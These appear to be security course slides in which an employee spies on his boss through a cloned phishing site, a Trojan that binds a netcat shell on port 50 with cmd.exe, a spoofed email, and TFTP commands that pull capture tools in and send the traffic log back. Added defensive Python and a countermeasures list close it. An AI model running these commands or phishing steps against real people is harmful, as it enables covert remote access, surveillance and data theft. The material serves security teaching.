TEL 283: What's the Boss viewing?

Policy

• The Boss established a new policy against surfing the web during work hours
• Phoenix decides to examine the sites that the Boss is looking at by spying on him

Setup

• The networked machines are connected via a switch
  ◦ Private 192.168.1.0 network
• Boss' IP: 192.168.1.5
• Phoenix's IP: 192.168.1.6

The Plan

• Monitor traffic to and from the Boss' machine
• How "loud" should this approach be?
  ◦ Loud/noisy means that it could trigger alarms on IDS/IPS systems
• There might be reasons to launch a noisy attack
  ◦ Provide a distraction from another attack
  ◦ Sometimes it's the only way to monitor traffic
• Since a single host's traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done

Viewing Switched Network Traffic

• "Loud" methods
  ◦ Gratuitous ARP for individual hosts
  ◦ ARP poisoning
  ◦ MAC spoofing
  ◦ MAC flooding
  ◦ SPAN (port mirroring)

Viewing Switched Network Traffic

• Gratuitous ARP
  ◦ Unsolicited ARP reply
  ◦ The protocol allows for it, without checking for a matching ARP request (stateless!)
  ◦ An ARP reply is sent out associating the target's IP with the collector's MAC address
• Spoof the MAC of the gateway
  ◦ The collector replies to ARP requests for the gateway's MAC
  ◦ The switch will see the router's MAC address on both switch ports and will send outbound traffic to both ports
• MAC flooding
  ◦ Overwhelm the switch's MAC table
  ◦ Causes the switch to "fail over" into hub mode
  ◦ MACOF (http://monkey.org/~dugsong/dsniff/)
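The three "loud" techniques on this slide all leave a footprint in ARP traffic, so here is a small monitor that flags them. It is an added example, not code from the course, and runs over a constructed packet list; the record layout, the baseline IP-to-MAC table and the flood threshold are assumptions.

```python
# Added example: an ARP monitor for the 192.168.1.0 network of the scenario.
# Flags (1) replies nobody asked for (gratuitous/unsolicited ARP),
# (2) replies whose IP->MAC claim disagrees with a known baseline (spoofing),
# (3) an unusual number of distinct source MACs (MAC flooding).
from collections import Counter

# Assumed baseline IP -> MAC table; the MAC addresses are constructed.
BASELINE = {
    "192.168.1.1": "00:11:22:33:44:01",   # gateway
    "192.168.1.5": "00:11:22:33:44:05",   # Boss
    "192.168.1.6": "00:11:22:33:44:06",   # Phoenix
}

# Constructed ARP records: (op, sender_mac, sender_ip, target_ip); op 1 = request, 2 = reply.
PACKETS = [
    (1, "00:11:22:33:44:05", "192.168.1.5", "192.168.1.1"),   # Boss asks for the gateway
    (2, "00:11:22:33:44:01", "192.168.1.1", "192.168.1.5"),   # genuine gateway reply
    (2, "00:11:22:33:44:06", "192.168.1.1", "192.168.1.5"),   # gateway IP claimed by another MAC
    (2, "00:11:22:33:44:06", "192.168.1.5", "192.168.1.1"),   # unsolicited reply for the Boss' IP
]

def analyze_arp(packets, baseline=BASELINE, flood_threshold=50):
    """Return alert strings for unsolicited, spoofed and flood-like ARP traffic."""
    alerts = []
    pending = set()            # target IPs with an outstanding request
    source_macs = Counter()
    for op, smac, sip, tip in packets:
        source_macs[smac] += 1
        if op == 1:
            pending.add(tip)
            continue
        # A reply claims "sip is at smac"; ARP itself never checks a request preceded it.
        if sip not in pending:
            alerts.append(f"unsolicited reply: {sip} is-at {smac}")
        else:
            pending.discard(sip)
        if sip in baseline and baseline[sip] != smac:
            alerts.append(f"spoof: {sip} expected {baseline[sip]} got {smac}")
    if len(source_macs) > flood_threshold:
        alerts.append(f"possible MAC flood: {len(source_macs)} distinct source MACs")
    return alerts

if __name__ == "__main__":
    for alert in analyze_arp(PACKETS):
        print(alert)
```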

Quieter method

• Capture the traffic on the target host itself
  ◦ Plant WinPcap and a Trojan horse on the host
• The trick will be to install the software on the target host
  ◦ The Boss will not blindly install software
  ◦ Have to convince him it's something of value to him
• The plan consists of a chained series of exploits

The Plan

• Copy a web site and host it on Phoenix's server
• Bind Netcat to a legitimate executable file
• Send email to the Boss
  ◦ He downloads the free executable; Netcat will also be downloaded and installed
• Connect to the Boss' machine using Netcat
• Use TFTP to download a WinDump program onto the Boss' machine
• Capture the Boss' network traffic
• Analyze the captured traffic
• Rebuild a jpg image using a hex editor

Phishing Scam

• Phoenix locates a site and plans to get his boss to visit a copied version of the site
  ◦ Lays the groundwork via some social engineering
  ◦ Tells the Boss of a site, "certificatepractice.com", which offers a free CCNA practice exam as a promotional offer
  ◦ Uses a utility to download and mirror the site
    ◦ Wget (www.gnu.org/software/wget)
    ◦ Copies the site recursively to the hard drive, to the appropriate depth of hyperlinks from the 1st page
    ◦ Will also copy the practice test executable
• Phoenix will bind his Trojan to this executable

Binding the Trojan

• A Trojan wrapper program is used
  ◦ YAB (Yet Another Binder)
    ◦ Areyoufearless.com (no longer there, however it can be obtained via BitTorrent sites)
    ◦ Altavista.net
    ◦ Packetstormsecurity.org
  ◦ Add Bind File option
    ◦ Allows Phoenix to bind nc.exe
    ◦ Will execute nc (asynchronously is possible)
    ◦ Can add execution parameters for when nc starts up: -p 50 -e cmd.exe -L
  ◦ Registry startup option available (default is no)
  ◦ Melt stub option
    ◦ Will remove Netcat after execution
  ◦ An icon can be added to make the install appear legitimate

Setting up the phishing site

• Overwrite the original ccna.exe file with the bound Trojan file in the phony site
• Register a very similar domain name
  ◦ "certification-practice.com"
• Send an email to the victim
  ◦ Phoenix uses an anonymous e-mailer and spoofs the email header so the "From:" appears to be the real site
    ◦ www.mail.com
    ◦ Doesn't require a "real" email address to register
  ◦ The victim would have to read the email message headers in order to see the real source domain

Email

• Check for spelling and grammatical errors
• Offer something free or on a trial basis
• Appeal to greed
  ◦ Why the victim is getting something for nothing
  ◦ Lowers suspicion
• Appeal to the victim's sense of self
  ◦ Self-help tools, adding to success, etc.
• Brevity
• The text of the email contains the link to the site
  ◦ Appears as the URL of the real site, but the hyperlink is really the phony site
• Present the email to the victim
  ◦ Possibly prepare the victim for the email, adding to the enticement
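The two slides above rely on the victim not reading headers and not noticing that a link's text and its target differ. The following is an added example, not course material, of the checks a mail filter or a suspicious recipient can run to surface both; the message, the domain names and the header layout are constructed to mirror the scenario.

```python
# Added example: surface a spoofed "From:" and a deceptive link in a received message.
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed message: From: shows the real site, but the relay and Return-Path do not.
RAW_EMAIL = """\
Return-Path: <bounce@mail.com>
Received: from mail.com (certification-practice.com [203.0.113.10])
From: CCNA Team <promo@certificatepractice.com>
To: boss@example.com
Subject: Free CCNA practice exam
Content-Type: text/html

<p>Grab your free exam at
<a href="http://certification-practice.com/ccna.exe">www.certificatepractice.com</a></p>
"""

def registrable(host):
    """Last two DNS labels; a crude stand-in for a public-suffix lookup (assumption)."""
    return ".".join((host or "").lower().split(".")[-2:])

def check_email(raw):
    """Return a list of findings; an empty list means no mismatch was seen."""
    msg = message_from_string(raw)
    findings = []
    from_dom = parseaddr(msg.get("From", ""))[1].split("@")[-1]
    path_dom = parseaddr(msg.get("Return-Path", ""))[1].split("@")[-1]
    if path_dom and registrable(path_dom) != registrable(from_dom):
        findings.append(f"From domain {from_dom} != Return-Path domain {path_dom}")
    # The relay's reverse-DNS name sits in parentheses in the Received: header.
    m = re.search(r"\(([\w.-]+) \[", msg.get("Received", ""))
    if m and registrable(m.group(1)) != registrable(from_dom):
        findings.append(f"From domain {from_dom} != sending host {m.group(1)}")
    # Links whose visible text is itself a URL/host pointing somewhere other than the href.
    for href, text in re.findall(r'<a\s+href="([^"]+)"[^>]*>([^<]+)</a>', msg.get_payload()):
        shown = text.strip()
        if re.match(r"(https?://)?[\w.-]+\.\w+$", shown):
            shown_host = urlparse(shown if "://" in shown else "http://" + shown).hostname
            href_host = urlparse(href).hostname
            if registrable(shown_host) != registrable(href_host):
                findings.append(f"link text {shown} but href host {href_host}")
    return findings
```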

Connect to the victim machine

• Angry IP Scanner
  ◦ www.angryziber.com/ipscan/
  ◦ Scan IPs on the network for the IP with port 50 open and listening
  ◦ Obtain the victim's IP address
• nc to the victim's machine on port 50
• Verify the connection using ipconfig
  ◦ Will show the victim machine's IP in the nc window

Install packet capture software

• Use command line utilities
  ◦ nc does not allow for usage of a GUI (Windows) interface
• Sysinternals has a TFTP server available
  ◦ Free
  ◦ No configuration required
  ◦ Windows already has a TFTP client!
• WinDump is downloaded
  ◦ www.winpcap.org/windump
  ◦ Placed into the default TFTP server directory (TFTP-Root)
• Phoenix sets up a TFTP server on his machine
• Using Netcat, Phoenix types
    tftp -i 192.168.1.6 get windump.exe windump.exe
  ◦ Syntax: tftp [-i] host [put | get] source destination
  ◦ The -i switch selects binary transfer

Run WinDump

• Options
  ◦ -c count (packets)
  ◦ -s snaplength (length of packets captured)
  ◦ -w filename (of captured packets)
• windump -c 500 -s 1500 -w capture.log
• If the victim does not have WinPcap installed, Phoenix must transfer and manually install WinPcap on the victim machine
  ◦ WinDump requires WinPcap

Installing WinPcap

• Phoenix downloads WinPcap
• Unzips it
• TFTPs the files (to the victim's winpcap directory)
  ◦ Daemon_mgm.exe
  ◦ NetMonInstaller.exe
  ◦ Npf_mgm.exe
  ◦ Rpcapd.exe
  ◦ Uninstall.exe
• Executes
  ◦ Npf_mgm.exe -r
  ◦ Daemon_mgm.exe -r
  ◦ NetMonInstaller.exe i

Analyzing the capture log

• Using Netcat: tftp -i 192.168.1.6 put capture.log
• Use a packet analyzer to view the traffic
  ◦ Wireshark
• A review shows the sites visited by the victim
  ◦ Includes a GET (HTTP) for a file called "gambling.jpg"
• Follow TCP stream
  ◦ Capture the output as raw data
  ◦ Use a hex editor (WinHex), if required, to edit the raw data
  ◦ Remove everything before the actual binary file (HTTP headers, etc.)
  ◦ Leaves just the actual binary of the image
  ◦ A JPEG starts with ÿØÿà (bytes FF D8 FF E0)
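Reconstructing a transferred file from a capture is the same task an incident responder faces when reviewing what left the network, so here is the hex-editor step from the slide done in code. This is an added example, not from the course; the captured bytes are constructed (only the JPEG marker values are real) and the stream is assumed to be one HTTP response followed by the next request, as "Follow TCP stream" would show it.

```python
# Added example: carve the image body out of a raw HTTP response.
# In a hex editor's Latin-1 pane the first four JPEG bytes FF D8 FF E0 show as "ÿØÿà".
JPEG_SOI = b"\xff\xd8\xff"   # Start Of Image; an APP0 (\xe0) marker normally follows
JPEG_EOI = b"\xff\xd9"       # End Of Image

# Constructed capture: status line, headers, a 13-byte JPEG-shaped body, then
# trailing bytes from the client's next request that must not end up in the file.
RAW_STREAM = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/jpeg\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\xff\xd9"
    b"GET /next HTTP/1.1\r\n"
)

def carve_http_body(stream):
    """Split a raw HTTP response into (headers, body), honouring Content-Length."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of HTTP headers found")
    headers = {}
    for line in head.split(b"\r\n")[1:]:            # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    length = int(headers.get("content-length", len(rest)))
    return headers, rest[:length]

def extract_jpeg(stream):
    """Return the JPEG bytes from the stream, or None if the body is not a JPEG."""
    headers, body = carve_http_body(stream)
    if not body.startswith(JPEG_SOI):
        return None
    end = body.rfind(JPEG_EOI)
    if end == -1:
        return None                                  # truncated transfer, no EOI marker
    return body[:end + len(JPEG_EOI)]

if __name__ == "__main__":
    image = extract_jpeg(RAW_STREAM)
    if image:
        with open("carved.jpg", "wb") as fh:
            fh.write(image)
```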

Finale

• An anonymous note is left on the victim's desk highlighting the activity
• The Internet usage policy is relaxed the next day

Countermeasures

• Phishing
  ◦ Training!
  ◦ Spam filters / phishing filters
• Trojan horse
  ◦ Anti-virus software
    ◦ Latest signatures
    ◦ However, organizations will alter the Trojan (for a price) so that it does not match a signature; EliteC0ders (no longer offers this "service")
  ◦ Software policy
• Sniffing
  ◦ Port security on switches: protects against ARP poisoning, MAC spoofing and MAC flooding
  ◦ IPS
  ◦ PromiScan
  ◦ Host-based IDS: Cisco Secure Agent warns if a new application is launching